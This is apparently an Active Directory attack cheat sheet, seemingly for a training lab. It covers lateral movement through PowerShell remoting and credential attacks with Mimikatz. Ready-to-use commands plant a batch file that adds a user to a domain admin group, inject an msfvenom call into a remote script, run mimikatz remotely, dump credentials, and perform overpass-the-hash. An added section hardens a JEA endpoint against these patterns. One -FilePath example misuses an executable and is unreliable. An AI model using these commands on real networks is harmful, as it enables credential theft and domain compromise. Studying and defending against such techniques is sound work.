Remoting

Using Find-LocalAdminAccess we can find machines on which the current user has local admin access, and with Enter-PSSession we can move laterally to them within the network.

Enter-PSSession -ComputerName <servername>

Stateful command via Enter-PSSession

$sess = New-PSSession -ComputerName <servername>
Enter-PSSession -Session $sess

Stateful command via Invoke-Command

$sess = New-PSSession -ComputerName <servername>
Invoke-Command -Session $sess -ScriptBlock { $proc = Get-Process }
Invoke-Command -Session $sess -ScriptBlock { $proc.Name }

Write file via script block

Invoke-Command -ComputerName <servername> -ConfigurationName dc_manage -Credential $cred -ScriptBlock {Set-Content -Path 'c:\program files\Keepmeon\admin.bat' -Value 'net group site_admin awallace /add /domain'}

Read, modify and write back a file via script block

Invoke-Command -ComputerName <servername> -ConfigurationName dc_manage -Credential $cred -ScriptBlock {((Get-Content "c:\users\imonks\Desktop\wm.ps1" -Raw) -replace 'Get-Volume','cmd.exe /c c:\utils\msfvenom.exe') | Set-Content -Path c:\users\akash\Desktop\wm.ps1}

Command execution using -Command and -ScriptBlock (-Command is an alias of -ScriptBlock, so both forms are equivalent)

Invoke-Command -ComputerName computer-name -ConfigurationName dc_manage -Credential $cred -Command {whoami}
Invoke-Command -ComputerName computer-name -ConfigurationName dc_manage -Credential $cred -ScriptBlock {whoami}
Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -Command {whoami}
Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -ScriptBlock {whoami}

File execution using ScriptBlock (the call operator & is required; a bare quoted path only outputs the string)

Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { & "C:\temp\mimikatz.exe" }

File execution using FilePath (-FilePath reads a local script file and runs its contents on the remote host; the file itself is not copied or launched there)

Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -FilePath "C:\temp\mimikatz.exe"
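Every command above that passes -ConfigurationName dc_manage lands in a session configuration, and what the caller can do inside it is decided by that configuration, not by the caller. The following is an added example (not from the original page) of registering a constrained JEA endpoint under that name, so that only an allow-listed set of cmdlets is visible and the Set-Content / & execution patterns shown above are rejected. The module name DcManageJea, the role name DcOps and the group CONTOSO\DCOPS are placeholders; run it elevated on the host that should accept the sessions.

```powershell
# Added example: lock down a session configuration named dc_manage with JEA.
# Placeholders: DcManageJea (module), DcOps (role), CONTOSO\DCOPS (allowed group).

# Role capability files are discovered in a RoleCapabilities folder of a module on $env:PSModulePath.
$moduleDir = Join-Path $env:ProgramFiles 'WindowsPowerShell\Modules\DcManageJea'
$roleDir   = Join-Path $moduleDir 'RoleCapabilities'
New-Item -ItemType Directory -Path $roleDir -Force | Out-Null
New-ModuleManifest -Path (Join-Path $moduleDir 'DcManageJea.psd1') -RootModule $null | Out-Null

# What a member of the DCOPS group may run inside the endpoint.
# Set-Content, Invoke-Expression, Start-Process and the call operator are deliberately
# absent, so writing files or launching binaries through this endpoint fails.
New-PSRoleCapabilityFile -Path (Join-Path $roleDir 'DcOps.psrc') -VisibleCmdlets @(
    'Get-Process',
    'Get-Service',
    'Get-Volume',
    @{ Name = 'Restart-Service'; Parameters = @{ Name = 'Name'; ValidateSet = 'Spooler', 'W32Time' } }
)

# Session configuration: restricted language mode, a virtual account instead of the
# caller's own credential (nothing to steal with a credential dump), and a transcript.
$pssc = Join-Path $env:TEMP 'DcManage.pssc'
New-PSSessionConfigurationFile -Path $pssc `
    -SessionType RestrictedRemoteServer `
    -RunAsVirtualAccount `
    -TranscriptDirectory 'C:\JeaTranscripts' `
    -RoleDefinitions @{ 'CONTOSO\DCOPS' = @{ RoleCapabilities = 'DcOps' } }

# Validate the file before registering; a malformed .pssc fails here rather than at WinRM restart.
if (-not (Test-PSSessionConfigurationFile -Path $pssc)) { throw "invalid session configuration file: $pssc" }

Register-PSSessionConfiguration -Name 'dc_manage' -Path $pssc -Force | Out-Null

# Verify: the endpoint exists, and only the allow-listed commands are visible from inside it.
# (The verifying account must be a member of CONTOSO\DCOPS to connect.)
Get-PSSessionConfiguration -Name 'dc_manage' | Format-List Name, RunAsUser, Permission
Invoke-Command -ComputerName localhost -ConfigurationName dc_manage -ScriptBlock { Get-Command } |
    Select-Object Name, CommandType
```

With this in place, Invoke-Command -ConfigurationName dc_manage -ScriptBlock { Set-Content ... } returns a "command not recognized" error from the endpoint, and every session is written to C:\JeaTranscripts for review.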

Mimikatz

Overpass-the-hash is an attack in which an adversary passes a user account's NTLM hash into the Kerberos authentication provider, obtaining Kerberos tickets from the hash alone.

Invoke-Mimikatz -DumpCreds
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")

Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlmhash> /run:powershell.exe"'
